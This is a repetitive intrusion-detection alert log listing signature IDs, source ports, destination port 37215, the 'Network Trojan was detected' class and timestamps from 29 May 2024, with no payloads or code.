                SID:2829579
                Source Port:38704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.516929
                SID:2829579
                Source Port:48210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612168
                SID:2835222
                Source Port:50076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023582
                SID:2835222
                Source Port:55462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209511
                SID:2829579
                Source Port:50516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418718
                SID:2829579
                Source Port:47508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896437
                SID:2835222
                Source Port:43464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437836
                SID:2835222
                Source Port:51364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816134
                SID:2835222
                Source Port:55262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915891
                SID:2829579
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233244
                SID:2829579
                Source Port:39808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902849
                SID:2835222
                Source Port:50016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535763
                SID:2835222
                Source Port:37472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420384
                SID:2835222
                Source Port:37194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687103
                SID:2835222
                Source Port:46658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008809
                SID:2835222
                Source Port:49652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173524
                SID:2829579
                Source Port:41918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397219
                SID:2829579
                Source Port:42030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659711
                SID:2835222
                Source Port:52792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660395
                SID:2829579
                Source Port:48064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519667
                SID:2829579
                Source Port:40160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419714
                SID:2829579
                Source Port:48644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640718
                SID:2829579
                Source Port:34218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.715877
                SID:2835222
                Source Port:37666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845591
                SID:2829579
                Source Port:39426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734796
                SID:2829579
                Source Port:44306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948650
                SID:2835222
                Source Port:43738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026616
                SID:2829579
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215426
                SID:2835222
                Source Port:49984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711892
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023840
                SID:2829579
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155514
                SID:2829579
                Source Port:36324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815746
                SID:2835222
                Source Port:53614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336329
                SID:2835222
                Source Port:53190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.331054
                SID:2829579
                Source Port:47690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.921271
                SID:2835222
                Source Port:36434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073833
                SID:2835222
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.237105
                SID:2835222
                Source Port:46712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712620
                SID:2835222
                Source Port:38548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453460
                SID:2835222
                Source Port:58798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277710
                SID:2829579
                Source Port:38878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731275
                SID:2829579
                Source Port:35434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654214
                SID:2829579
                Source Port:48056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567262
                SID:2829579
                Source Port:44196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842215
                SID:2829579
                Source Port:34352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655874
                SID:2829579
                Source Port:59896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958012
                SID:2829579
                Source Port:49164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421839
                SID:2829579
                Source Port:47314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.848303
                SID:2835222
                Source Port:36348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767576
                SID:2835222
                Source Port:60158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227328
                SID:2829579
                Source Port:60722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263066
                SID:2835222
                Source Port:37586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731854
                SID:2835222
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609731
                SID:2835222
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909963
                SID:2829579
                Source Port:53032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458027
                SID:2829579
                Source Port:52298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684968
                SID:2829579
                Source Port:37880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175754
                SID:2835222
                Source Port:46356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740199
                SID:2829579
                Source Port:50146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980060
                SID:2835222
                Source Port:48386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860735
                SID:2835222
                Source Port:60950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510995
                SID:2835222
                Source Port:55288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591091
                SID:2835222
                Source Port:39972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227912
                SID:2829579
                Source Port:53628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325916
                SID:2829579
                Source Port:45624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447310
                SID:2835222
                Source Port:41444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611236
                SID:2835222
                Source Port:40942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545858
                SID:2835222
                Source Port:45410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978769
                SID:2829579
                Source Port:59776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929036
                SID:2829579
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168661
                SID:2829579
                Source Port:46376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675276
                SID:2829579
                Source Port:58068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434870
                SID:2829579
                Source Port:42642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339730
                SID:2829579
                Source Port:48542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320784
                SID:2829579
                Source Port:33904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583512
                SID:2835222
                Source Port:49390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359478
                SID:2835222
                Source Port:58434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371477
                SID:2829579
                Source Port:45076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854479
                SID:2835222
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420992
                SID:2829579
                Source Port:50402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651643
                SID:2829579
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841753
                SID:2835222
                Source Port:39280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663715
                SID:2835222
                Source Port:44276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108902
                SID:2829579
                Source Port:40638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832904
                SID:2829579
                Source Port:34950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.898196
                SID:2829579
                Source Port:56334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560788
                SID:2829579
                Source Port:48592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903548
                SID:2829579
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886158
                SID:2829579
                Source Port:56620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947663
                SID:2829579
                Source Port:56840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629861
                SID:2835222
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560991
                SID:2835222
                Source Port:38680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.120620
                SID:2829579
                Source Port:50576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292563
                SID:2829579
                Source Port:40812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243580
                SID:2835222
                Source Port:48282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567117
                SID:2829579
                Source Port:49424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179132
                SID:2835222
                Source Port:37614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731522
                SID:2835222
                Source Port:40744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965272
                SID:2835222
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520606
                SID:2835222
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364251
                SID:2835222
                Source Port:58388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316418
                SID:2829579
                Source Port:45480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824245
                SID:2835222
                Source Port:52542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669561
                SID:2829579
                Source Port:56288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532677
                SID:2835222
                Source Port:53478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889016
                SID:2835222
                Source Port:57568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263831
                SID:2829579
                Source Port:42416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911069
                SID:2829579
                Source Port:54712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.170998
                SID:2829579
                Source Port:51758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557680
                SID:2835222
                Source Port:40104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855764
                SID:2829579
                Source Port:60168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871668
                SID:2835222
                Source Port:35758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076560
                SID:2829579
                Source Port:33580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362944
                SID:2829579
                Source Port:58052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.471949
                SID:2835222
                Source Port:59330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896312
                SID:2829579
                Source Port:45534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972356
                SID:2835222
                Source Port:41744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716425
                SID:2829579
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830823
                SID:2829579
                Source Port:57278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686388
                SID:2829579
                Source Port:44906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265550
                SID:2829579
                Source Port:41800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.814588
                SID:2829579
                Source Port:50660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232060
                SID:2829579
                Source Port:36638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844105
                SID:2835222
                Source Port:35268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135341
                SID:2835222
                Source Port:40814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665413
                SID:2829579
                Source Port:44934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269161
                SID:2829579
                Source Port:53934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915102
                SID:2835222
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865041
                SID:2835222
                Source Port:60492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903705
                SID:2835222
                Source Port:52412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163640
                SID:2835222
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240786
                SID:2835222
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166140
                SID:2829579
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290270
                SID:2835222
                Source Port:56352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.041889
                SID:2829579
                Source Port:53928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023210
                SID:2835222
                Source Port:38480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133821
                SID:2829579
                Source Port:43720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174609
                SID:2829579
                Source Port:34798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716022
                SID:2835222
                Source Port:35776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833558
                SID:2829579
                Source Port:36062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466147
                SID:2829579
                Source Port:60202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263049
                SID:2829579
                Source Port:54876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509779
                SID:2835222
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766951
                SID:2829579
                Source Port:47374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712844
                SID:2829579
                Source Port:58020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785487
                SID:2835222
                Source Port:43966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640779
                SID:2835222
                Source Port:53996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965746
                SID:2835222
                Source Port:37506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920112
                SID:2835222
                Source Port:48548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855991
                SID:2835222
                Source Port:50924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933223
                SID:2829579
                Source Port:40162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014702
                SID:2835222
                Source Port:36894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.389759
                SID:2829579
                Source Port:44464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.983892
                SID:2835222
                Source Port:36806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798715
                SID:2835222
                Source Port:54904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065246
                SID:2835222
                Source Port:58728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.399913
                SID:2835222
                Source Port:53190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141213
                SID:2835222
                Source Port:55892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266335
                SID:2835222
                Source Port:37410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281804
                SID:2829579
                Source Port:46830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269752
                SID:2835222
                Source Port:55004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618654
                SID:2835222
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.715998
                SID:2835222
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264759
                SID:2829579
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231056
                SID:2829579
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277497
                SID:2829579
                Source Port:54086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941400
                SID:2829579
                Source Port:44496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075269
                SID:2829579
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766407
                SID:2829579
                Source Port:47546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964708
                SID:2829579
                Source Port:55778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567777
                SID:2829579
                Source Port:39870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433961
                SID:2835222
                Source Port:60818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520657
                SID:2829579
                Source Port:47542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072317
                SID:2835222
                Source Port:47142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840346
                SID:2835222
                Source Port:51232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229118
                SID:2835222
                Source Port:38134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685798
                SID:2829579
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083528
                SID:2829579
                Source Port:54584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438807
                SID:2835222
                Source Port:41890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.615085
                SID:2835222
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363246
                SID:2835222
                Source Port:43016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864062
                SID:2829579
                Source Port:58780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519776
                SID:2835222
                Source Port:52284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026754
                SID:2829579
                Source Port:56394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039852
                SID:2829579
                Source Port:42336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666218
                SID:2829579
                Source Port:35094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620851
                SID:2829579
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.972075
                SID:2835222
                Source Port:58860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321609
                SID:2829579
                Source Port:34898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333557
                SID:2829579
                Source Port:32932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269145
                SID:2829579
                Source Port:39554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826808
                SID:2829579
                Source Port:35822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520987
                SID:2835222
                Source Port:56354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655644
                SID:2829579
                Source Port:38304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685713
                SID:2829579
                Source Port:48016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189891
                SID:2835222
                Source Port:54966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172884
                SID:2835222
                Source Port:47424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337089
                SID:2829579
                Source Port:39478
                Destination Port:37215
